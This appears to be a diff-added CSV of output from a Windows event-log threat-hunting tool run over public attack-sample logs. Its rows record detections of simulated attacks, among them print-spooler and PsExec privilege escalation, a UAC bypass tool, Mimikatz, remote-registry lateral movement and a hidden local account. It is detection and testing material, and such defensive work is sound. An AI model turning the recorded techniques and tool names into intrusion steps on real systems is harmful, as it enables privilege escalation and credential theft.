+2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
+2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
+2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
+2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
+2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
+2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
+2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
+2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx
+2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
